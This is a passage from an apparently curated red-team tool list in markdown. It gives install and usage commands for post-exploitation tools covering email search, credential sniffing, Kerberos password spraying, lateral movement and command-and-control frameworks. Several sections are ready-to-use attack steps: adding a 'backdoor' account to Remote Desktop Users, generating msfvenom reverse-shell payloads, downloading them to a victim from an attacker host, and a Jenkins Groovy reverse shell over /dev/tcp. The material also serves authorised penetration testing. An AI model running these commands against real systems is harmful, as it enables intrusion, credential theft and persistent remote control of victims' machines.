2696 | MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.
2697 |
2698 | MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.
2699 |
2700 | Nice blog post with more information about [here](https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/).
2701 |
2702 | [MailSniper Field Manual](http://www.dafthack.com/files/MailSniper-Field-Manual.pdf)
2703 |
2704 | **Install:**
2705 |
2706 | ```
2707 | git clone https://github.com/dafthack/MailSniper
2708 | cd MailSniper
2709 | Import-Module MailSniper.ps1
2710 | ```
2711 |
2712 | **Usage:**
2713 |
2714 | ```bash
2715 | # Search current users mailbox
2716 | Invoke-SelfSearch -Mailbox current-user@domain.com
2717 | ```
2718 |
2719 | 
2720 |
2721 | *Image used from https://patrowl.io/*
2722 |
2723 | Discovery
2724 | ====================
2725 |
2726 | ### [🔙](#tool-list)[PCredz](https://github.com/lgandx/PCredz)
2727 |
2728 | This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
2729 |
2730 | **Install:**
2731 |
2732 | ```bash
2733 | git clone https://github.com/lgandx/PCredz
2734 | ```
2735 |
2736 | **Usage:** (PCAP File Folder)
2737 |
2738 | ```python
2739 | python3 ./Pcredz -d /tmp/pcap-directory-to-parse/
2740 | ```
2741 |
2742 | **Usage:** (Live Capture)
2743 |
2744 | ```python
2745 | python3 ./Pcredz -i eth0 -v
2746 | ```
2747 |
2748 | 
2749 |
2750 | ### [🔙](#tool-list)[PingCastle](https://github.com/vletoux/pingcastle)
2751 |
2752 | Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.
2753 |
2754 | **Install:** (Download)
2755 |
2756 | ```
2757 | https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip
2758 | ```
2759 |
2760 | **Usage:**
2761 |
2762 | ```python
2763 | ./PingCastle.exe
2764 | ```
2765 |
2766 | 
2767 |
2768 | ### [🔙](#tool-list)[Seatbelt](https://github.com/GhostPack/Seatbelt)
2769 |
2770 | Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.
2771 |
2772 | It is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings
2773 |
2774 | **Install: (Compile)**
2775 |
2776 | Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/).
2777 |
2778 | Open up the project .sln, choose "release", and build.
2779 |
2780 | **Usage:**
2781 |
2782 | ```bash
2783 | # Run all checks and output to output.txt
2784 | Seatbelt.exe -group=all -full > output.txt
2785 |
2786 | # Return 4624 logon events for the last 30 days
2787 | Seatbelt.exe "LogonEvents 30"
2788 |
2789 | # Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*
2790 | Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true"
2791 |
2792 | # Run remote-focused checks against a remote system
2793 | Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
2794 | ```
2795 |
2796 | Full command groups and parameters can be found [here](https://github.com/GhostPack/Seatbelt#command-groups).
2797 |
2798 | 
2799 |
2800 | *Image used from https://exord66.github.io/csharp-in-memory-assemblies*
2801 |
2802 | ### [🔙](#tool-list)[ADRecon](https://github.com/sense-of-security/adrecon)
2803 |
2804 | Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.
2805 |
2806 | It can be run from any workstation that is connected to the environment, even hosts that are not domain members.
2807 |
2808 | [BlackHat USA 2018 SlideDeck](https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation)
2809 |
2810 | **Prerequisites**
2811 |
2812 | - .NET Framework 3.0 or later (Windows 7 includes 3.0)
2813 | - PowerShell 2.0 or later (Windows 7 includes 2.0)
2814 |
2815 | **Install: (Git)**
2816 |
2817 | ```bash
2818 | git clone https://github.com/sense-of-security/ADRecon.git
2819 | ```
2820 |
2821 | **Install: (Download)**
2822 |
2823 | You can download a zip archive of the [latest release](https://github.com/sense-of-security/ADRecon/archive/master.zip).
2824 |
2825 | **Usage:**
2826 |
2827 | ```bash
2828 | # To run ADRecon on a domain member host.
2829 | PS C:\> .\ADRecon.ps1
2830 |
2831 | # To run ADRecon on a domain member host as a different user.
2832 | PS C:\>.\ADRecon.ps1 -DomainController -Credential
2833 |
2834 | # To run ADRecon on a non-member host using LDAP.
2835 | PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController -Credential
2836 |
2837 | # To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)
2838 | PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController -Credential -Collect Domain, DomainControllers
2839 | ```
2840 |
2841 | Full usage and parameter information can be found [here](https://github.com/sense-of-security/adrecon#usage).
2842 |
2843 | 
2844 |
2845 | *Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/*
2846 |
2847 | ### [🔙](#tool-list)[adidnsdump](https://github.com/dirkjanm/adidnsdump)
2848 |
2849 | By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.
2850 |
2851 | This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.
2852 |
2853 | **Install: (Pip)**
2854 |
2855 | ```bash
2856 | pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump
2857 | ```
2858 |
2859 | **Install: (Git)**
2860 |
2861 | ```bash
2862 | git clone https://github.com/dirkjanm/adidnsdump
2863 | cd adidnsdump
2864 | pip install .
2865 | ```
2866 |
2867 | **Note:** *The tool requires `impacket` and `dnspython` to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install [impacket from GitHub](https://github.com/CoreSecurity/impacket).*
2868 |
2869 | **Usage:**
2870 |
2871 | ```bash
2872 | # Display the zones in the domain where you are currently in
2873 | adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp
2874 |
2875 | # Display all zones in the domain
2876 | adidnsdump -u icorp\\testuser icorp-dc.internal.corp
2877 |
2878 | # Resolve all unknown records (-r)
2879 | adidnsdump -u icorp\\testuser icorp-dc.internal.corp -r
2880 | ```
2881 |
2882 | [Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)
2883 |
2884 | 
2885 |
2886 | *Image used from https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/*
2887 |
2888 | ### [🔙](#tool-list)[kerbrute](https://github.com/ropnop/kerbrute)
2889 |
2890 | A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
2891 |
2892 | **Install: (Go)**
2893 |
2894 | ```bash
2895 | go get github.com/ropnop/kerbrute
2896 | ```
2897 |
2898 | **Install: (Make)**
2899 |
2900 | ```bash
2901 | git clone https://github.com/ropnop/kerbrute
2902 | cd kerbrute
2903 | make all
2904 | ```
2905 |
2906 | **Usage:**
2907 |
2908 | ```bash
2909 | # User Enumeration
2910 | ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
2911 |
2912 | # Password Spray
2913 | ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
2914 |
2915 | # Brute User
2916 | ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
2917 |
2918 | # Brute Force
2919 | ./kerbrute -d lab.ropnop.com bruteforce -
2920 | ```
2921 |
2922 | 
2923 |
2924 | *Image used from https://matthewomccorkle.github.io/day_032_kerbrute/*
2925 |
2926 | ### [🔙](#tool-list)[scavenger](https://github.com/SpiderLabs/scavenger)
2927 |
2928 | Scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.
2929 |
2930 | Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.
2931 |
2932 | **Install:**
2933 |
2934 | First install CrackMapExec from [here](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation).
2935 |
2936 | ```bash
2937 | git clone https://github.com/SpiderLabs/scavenger
2938 | cd scavenger
2939 | ```
2940 |
2941 | **Usage:**
2942 |
2943 | ```bash
2944 | # Search for interesting files on victim endpoint
2945 | python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
2946 | ```
2947 |
2948 | Nice [blog post](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/).
2949 |
2950 | 
2951 |
2952 | *Image used from https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/*
2953 |
2954 | Lateral Movement
2955 | ====================
2956 |
2957 | ### [🔙](#tool-list)[crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec)
2958 |
2959 | This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.
2960 |
2961 | **Install:**
2962 |
2963 | ```bash
2964 | sudo apt install crackmapexec
2965 | ```
2966 |
2967 | **Usage:**
2968 |
2969 | ```bash
2970 | crackmapexec smb -d -u -p
2971 | ```
2972 |
2973 | 
2974 |
2975 | ### [🔙](#tool-list)[WMIOps](https://github.com/FortyNorthSecurity/WMIOps)
2976 |
2977 | WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.
2978 |
2979 | Developed by [@christruncer](https://twitter.com/christruncer).
2980 |
2981 | Original [blog post](https://www.christophertruncer.com/introducing-wmi-ops/) documenting release.
2982 |
2983 | **Install: (PowerShell)**
2984 |
2985 | ```bash
2986 | git clone https://github.com/FortyNorthSecurity/WMIOps
2987 | Import-Module WMIOps.ps1
2988 | ```
2989 |
2990 | **Usage:**
2991 |
2992 | ```bash
2993 | # Executes a user specified command on the target machine
2994 | Invoke-ExecCommandWMI
2995 |
2996 | # Returns all running processes from the target machine
2997 | Get-RunningProcessesWMI
2998 |
2999 | # Checks if a user is active at the desktop on the target machine (or if away from their machine)
3000 | Find-ActiveUsersWMI
3001 |
3002 | # Lists all local and network connected drives on target system
3003 | Get-SystemDrivesWMI
3004 |
3005 | # Executes a powershell script in memory on the target host via WMI and returns the output
3006 | Invoke-RemoteScriptWithOutput
3007 | ```
3008 |
3009 | 
3010 |
3011 | 
3012 |
3013 | *Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/*
3014 |
3015 | ### [🔙](#tool-list)[PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell)
3016 |
3017 | Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.
3018 |
3019 | **Install:**
3020 |
3021 | ```bash
3022 | git clone https://github.com/Mr-Un1k0d3r/PowerLessShell
3023 | cd PowerLessShell
3024 | ```
3025 |
3026 | **Usage:**
3027 |
3028 | ```bash
3029 | # Help
3030 | python PowerLessShell.py -h
3031 |
3032 | # Generate PowerShell payload
3033 | python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj
3034 |
3035 | # Generating a shellcode payload
3036 | python PowerLessShell.py -source shellcode.raw -output malicious.csproj
3037 | ```
3038 |
3039 | Full usage information can be found [here](https://github.com/Mr-Un1k0d3r/PowerLessShell#usage).
3040 |
3041 | 
3042 |
3043 | *Image used from https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628*
3044 |
3045 | ### [🔙](#tool-list)[PsExec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec)
3046 |
3047 | PsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.
3048 |
3049 | It is great for remotely executing commands on target machines.
3050 |
3051 | **Note:** Some AVs detect PsExec as a 'remote admin' virus.
3052 |
3053 | **Install: (PowerShell)**
3054 |
3055 | ```bash
3056 | Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'
3057 | Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools"
3058 | Move-Item -Path "$env:TEMP\pstools\psexec.exe" .
3059 | Remove-Item -Path "$env:TEMP\pstools" -Recurse
3060 | ```
3061 |
3062 | **Usage:**
3063 |
3064 | ```bash
3065 | # Prevent the license agreement from being displayed
3066 | psexec.exe /accepteula
3067 |
3068 | # Run the 'hostname' command on remote machine
3069 | psexec.exe \\REMOTECOMPUTER hostname
3070 |
3071 | # Run the 'hostname' command on EVERYTHING (on the domain)
3072 | psexec.exe \\* hostname
3073 |
3074 | # Run a local executable on a remote machine
3075 | psexec.exe \\REMOTECOMPUTER -c C:\Tools\program.exe
3076 |
3077 | # Run the 'hostname' command with different credentials
3078 | psexec.exe \\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word
3079 |
3080 | # Spawn shell on remote machine
3081 | psexec.exe -s \\REMOTECOMPUTER cmd
3082 | ```
3083 |
3084 | Great [blog post](https://adamtheautomator.com/psexec/) on PsExec usage.
3085 |
3086 | 
3087 |
3088 | *Image used from https://adamtheautomator.com/psexec/*
3089 |
3090 | ### [🔙](#tool-list)[LiquidSnake](https://github.com/RiccardoAncarani/LiquidSnake)
3091 |
3092 | Liquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.
3093 |
3094 | The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.
3095 |
3096 | The project is composed by two separate solutions:
3097 |
3098 | - `CSharpNamedPipeLoader` - the component that will be transformed in VBS via GadgetToJScript
3099 | - `LiquidSnake` - the component responsible to creating the WMI Event Subscription on the remote system
3100 |
3101 | **Install:**
3102 |
3103 | Open both solutions in Visual Studio and build. *Make sure to target x64 architecture for the `CSharpNamedPipeLoader`.*
3104 |
3105 | Output: Two separate EXEs: `CSharpNamedPipeLoader.exe` and `LiquidSnake.exe`
3106 |
3107 | Full build information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#building).
3108 |
3109 | **Usage:**
3110 |
3111 | Use `LiquidSnake.exe` agains a host where you have administrative access over as follows:
3112 |
3113 | ```bash
3114 | LiquidSnake.exe [ ]
3115 | LiquidSnake.exe dc01.isengard.local
3116 | LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local
3117 | ```
3118 |
3119 | If everything went fine, you should obtain an output similar as the following:
3120 |
3121 | ```bash
3122 | [*] Event filter created.
3123 | [*] Event consumer created.
3124 | [*] Subscription created, now sleeping
3125 | [*] Sending some DCOM love..
3126 | [*] Sleeping again... long day
3127 | ```
3128 |
3129 | General usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#usage).
3130 |
3131 | Full `LiquidSnake` usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake).
3132 |
3133 | 
3134 |
3135 | *Image used from https://github.com/RiccardoAncarani/LiquidSnake#usage*
3136 |
3137 | ### [🔙](#tool-list)Enabling RDP
3138 |
3139 | ```shell
3140 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
3141 | netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
3142 | net localgroup "Remote Desktop Users" "backdoor" /add
3143 | ```
3144 |
3145 | ### [🔙](#tool-list)Upgrading shell to meterpreter
3146 |
3147 | Shells (https://infinitelogins.com/tag/payloads/)
3148 |
3149 | After getting basic shell access to an endpoint a meterpreter is nicer to continue with.
3150 |
3151 | **[attacker]** Generate a meterpreter shell:
3152 |
3153 | ```shell
3154 | msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
3155 | msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
3156 | ```
3157 |
3158 | 
3159 |
3160 | **[victim]** Download to victim endpoint:
3161 |
3162 | ```shell
3163 | powershell "(New-Object System.Net.WebClient).Downloadfile('http://:8000/shell-name.exe','shell-name.exe')"`
3164 | ```
3165 |
3166 | **[attacker]** Configure listener:
3167 |
3168 | ```shell
3169 | use exploit/multi/handler
3170 | set PAYLOAD windows/meterpreter/reverse_tcp
3171 | set LHOST your-ip
3172 | set LPORT listening-port run`
3173 | ```
3174 |
3175 | **[victim]** Execute payload:
3176 |
3177 | ```shell
3178 | Start-Process "shell-name.exe"`
3179 | ```
3180 |
3181 | 
3182 |
3183 | ### [🔙](#tool-list)Forwarding Ports
3184 |
3185 | Sometimes, after gaining access to an endpoint there are local ports. Making these internal ports external routable can help for lateral movement to other services on the host.
3186 |
3187 | ```bash
3188 | socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 &
3189 | socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT &
3190 | ```
3191 |
3192 | ### [🔙](#tool-list)Jenkins reverse shell
3193 |
3194 | If you gain access to a jenkins script console you can use this to gain a reverse shell on the node.
3195 |
3196 | ```jenkins
3197 | r = Runtime.getRuntime()
3198 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3199 | p.waitFor()
3200 | ```
3201 |
3202 | ### [🔙](#tool-list)[ADFSpoof](https://github.com/mandiant/ADFSpoof)
3203 |
3204 | Created by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye.
3205 |
3206 | ADFSpoof has two main functions:
3207 |
3208 | 1. Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.
3209 | 2. Given a signing key, produce a signed security token that can be used to access a federated application.
3210 |
3211 | This tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof.
3212 |
3213 | **Install:**
3214 |
3215 | **Note:** *ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available [here](https://github.com/dmb2168/cryptography).*
3216 |
3217 | ```bash
3218 | git clone https://github.com/mandiant/ADFSpoof
3219 | pip install -r requirements.txt
3220 | ```
3221 |
3222 | **Usage:**
3223 |
3224 | ```bash
3225 | # Decrypt the EncryptedPFX and write to disk
3226 | python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump
3227 |
3228 | # Generate a security token for Office365
3229 | python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759
3230 | ```
3231 |
3232 | Full usage information can be found [here](https://github.com/mandiant/ADFSpoof#usage).
3233 |
3234 | Additional command examples can be found [here](https://github.com/mandiant/ADFSpoof#examples).
3235 |
3236 | 
3237 |
3238 | *Image used from https://github.com/mandiant/ADFSpoof#usage*
3239 |
3240 | ### [🔙](#tool-list)[Coercer](https://github.com/p0dalirius/Coercer)
3241 |
3242 | A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.
3243 |
3244 | Features:
3245 |
3246 | - Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)
3247 | - Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)
3248 | - Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
3249 | - Random UNC paths generation to avoid caching failed attempts (all modes)
3250 | - Configurable delay between attempts with --delay
3251 |
3252 | More feature information [here](https://github.com/p0dalirius/Coercer#features).
3253 |
3254 | **Install: (pip)**
3255 |
3256 | ```bash
3257 | sudo python3 -m pip install coercer
3258 | ```
3259 |
3260 | **Usage:**
3261 |
3262 | ```bash
3263 | # Scan mode (Assess the Remote Procedure Calls listening on a machine)
3264 | ./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v
3265 |
3266 | # Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)
3267 | ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v
3268 |
3269 | # Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)
3270 | ./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v
3271 | ```
3272 |
3273 | 
3274 |
3275 | *Image used from https://github.com/p0dalirius/Coercer#quick-start*
3276 |
3277 | Collection
3278 | ====================
3279 |
3280 | ### [🔙](#tool-list)[BloodHound](https://github.com/BloodHoundAD/BloodHound)
3281 |
3282 | An application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties.
3283 |
3284 | **Install:** [PenTestPartners Walkthrough](https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/)
3285 |
3286 | **Custom Queries:** [CompassSecurity BloodHoundQueries](https://github.com/CompassSecurity/BloodHoundQueries)
3287 |
3288 | 
3289 |
3290 | ### [🔙](#tool-list)[Snaffler](https://github.com/SnaffCon/Snaffler)
3291 |
3292 | Snaffler is an advanced credential scanner/collector for Active Directory environments. *With a great [README](https://github.com/SnaffCon/Snaffler/blob/master/README.md)*.
3293 |
3294 | Snaffler uses a system of "classifiers", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.
3295 |
3296 | *More information about Snaffler [rules](https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset).*
3297 |
3298 | '*Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.*' - Snaffler README (2023)
3299 |
3300 | **Install:**
3301 |
3302 | You can download the binary from the [GitHub Releases Page](https://github.com/SnaffCon/Snaffler/releases).
3303 |
3304 | **Usage:**
3305 |
3306 | ```bash
3307 | # Targeted local scan (less likely to trigger detections)
3308 | Snaffler.exe -s -i C:\
3309 |
3310 | # Go in loud and find everything
3311 | snaffler.exe -s -o snaffler.log
3312 | ```
3313 |
3314 | 
3315 |
3316 | *Image used from https://github.com/SnaffCon/Snaffler#what-does-it-look-like*
3317 |
3318 | ### [🔙](#tool-list)[linWinPwn](https://github.com/lefayjey/linWinPwn)
3319 |
3320 | linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks.
3321 |
3322 | The script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.
3323 |
3324 | linWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.
3325 |
3326 | **Install:**
3327 |
3328 | ```bash
3329 | git clone https://github.com/lefayjey/linWinPwn
3330 | cd linWinPwn; chmod +x linWinPwn.sh
3331 | chmod +x install.sh
3332 | ./install.sh
3333 | ```
3334 |
3335 | **Usage:**
3336 |
3337 | ```bash
3338 | # Default: interactive - Open interactive menu to run checks separately
3339 | ./linWinPwn.sh -t [-d -u -p -o ]
3340 |
3341 | # Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules
3342 | ./linWinPwn.sh -t --auto-config
3343 |
3344 | # LDAPS - Use LDAPS instead of LDAP (port 636)
3345 | ./linWinPwn.sh -t --ldaps
3346 |
3347 | # Module pwd_dump: Password Dump
3348 | ./linWinPwn.sh -t -M pwd_dump [-d -u -p -o ]
3349 | ```
3350 |
3351 | Full usage information [here](https://github.com/lefayjey/linWinPwn#usage).
3352 |
3353 | 
3354 |
3355 | *Image used from https://github.com/lefayjey/linWinPwn#demos*
3356 |
3357 | Command and Control
3358 | ====================
3359 |
3360 | ### [🔙](#tool-list)[Havoc](https://github.com/HavocFramework/Havoc)
3361 |
3362 | Havoc is a modern and malleable post-exploitation command and control framework, created by [@C5pider](https://twitter.com/C5pider).
3363 |
3364 | Features include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs
3365 |
3366 | **Pre-requisites:** (Ubuntu 20.04 / 22.04)
3367 |
3368 | ```bash
3369 | sudo apt install build-essential
3370 | sudo add-apt-repository ppa:deadsnakes/ppa
3371 | sudo apt update
3372 | sudo apt install python3.10 python3.10-dev
3373 | ```
3374 |
3375 | **Build + Usage:**
3376 |
3377 | ```bash
3378 | git clone https://github.com/HavocFramework/Havoc.git
3379 | cd Havoc/Client
3380 | make
3381 | ./Havoc
3382 | ```
3383 |
3384 | **Pre-requisites:** (Ubuntu 20.04 / 22.04)
3385 |
3386 | ```bash
3387 | cd Havoc/Teamserver
3388 | go mod download golang.org/x/sys
3389 | go mod download github.com/ugorji/go
3390 | ```
3391 |
3392 | **Build + Usage:**
3393 |
3394 | ```bash
3395 | cd Teamserver
3396 | ./Install.sh
3397 | make
3398 | ./teamserver -h
3399 | ```
3400 |
3401 | **Run the teamserver**
3402 |
3403 | ```bash
3404 | sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug
3405 | ```
3406 |
3407 | *Full install, build and run instructions on the [wiki](https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD)*
3408 |
3409 | 
3410 |
3411 | ### [🔙](#tool-list)[Covenant](https://github.com/cobbr/Covenant)
3412 |
3413 | Covenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.
3414 |
3415 | It can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.
3416 |
3417 | **Install: (Dotnet Core)**
3418 |
3419 | You can download dotnet core for your platform from [here](https://dotnet.microsoft.com/download/dotnet-core/3.1).
3420 |
3421 | **Note:** *After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user*
3422 |
3423 | ```bash
3424 | git clone --recurse-submodules https://github.com/cobbr/Covenant
3425 | cd Covenant/Covenant
3426 | ```
3427 |
3428 | **Usage: (Dotnet Core)**
3429 |
3430 | ```bash
3431 | ~/Covenant/Covenant > dotnet run
3432 | warn: Microsoft.EntityFrameworkCore.Model.Validation[10400]
3433 | Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.
3434 | WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.
3435 | Covenant has started! Navigate to https://127.0.0.1:7443 in a browser
3436 | ```
3437 |
3438 | **Install: (Docker)**
3439 |
3440 | ```bash
3441 | # Build the docker image:
3442 | git clone --recurse-submodules https://github.com/cobbr/Covenant
3443 | cd Covenant/Covenant
3444 | ~/Covenant/Covenant > docker build -t covenant .
3445 | ```
3446 |
3447 | **Usage: (Docker)**
3448 |
3449 | ```bash
3450 | # Run Covenant within the Docker container
3451 | ~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v :/app/Data covenant
3452 |
3453 | # Stop the container
3454 | ~/Covenant/Covenant > docker stop covenant
3455 |
3456 | # Restart Covenant interactively
3457 | ~/Covenant/Covenant > docker start covenant -ai
3458 | ```
3459 |
3460 | Full installation and startup instructions can be found on the wiki [here](https://github.com/cobbr/Covenant/wiki/Installation-And-Startup).
3461 |
3462 | 
3463 |
3464 | *Image from https://github.com/cobbr/Covenant*
3465 |
3466 | ### [🔙](#tool-list)[Merlin](https://github.com/Ne0nd0g/merlin)
3467 |
3468 | Merlin is an open-source post-exploitation framework that is designed to be used after a initial compromise of a system.
3469 |
3470 | It is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.
3471 |
3472 | **Install:**
3473 |
3474 | 1. Download the latest compiled version of Merlin Server from the [releases](https://github.com/Ne0nd0g/merlin/releases) section
3475 | 2. Extract the files with 7zip using the x function The password is: merlin
3476 | 3. Start Merlin
3477 | 4. Configure a [listener](https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html)
3478 | 5. Deploy an agent. See [Agent Execution Quick Start Guide](https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html) for examples
3479 |
3480 | ```bash
3481 | mkdir /opt/merlin;cd /opt/merlin
3482 | wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
3483 | 7z x merlinServer-Linux-x64.7z
3484 | sudo ./merlinServer-Linux-x64
3485 | ```
3486 |
3487 | **Usage:**
3488 |
3489 | 1. Ensure the Merlin server is running with a configured listener
3490 | 2. Download and deploy an agent to the victim
3491 | 3. Execute agent
3492 |
3493 | For detailed usage information see the official Merlin [wiki](https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html).
3494 |
3495 | 
3496 |
3497 | *Image from https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks*
3498 |
3499 | ### [🔙](#tool-list)[Metasploit Framework](https://github.com/rapid7/metasploit-framework)
3500 |
3501 | Metasploit is an open-source framework for developing, testing, and using exploit code.
3502 |
3503 | The Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.
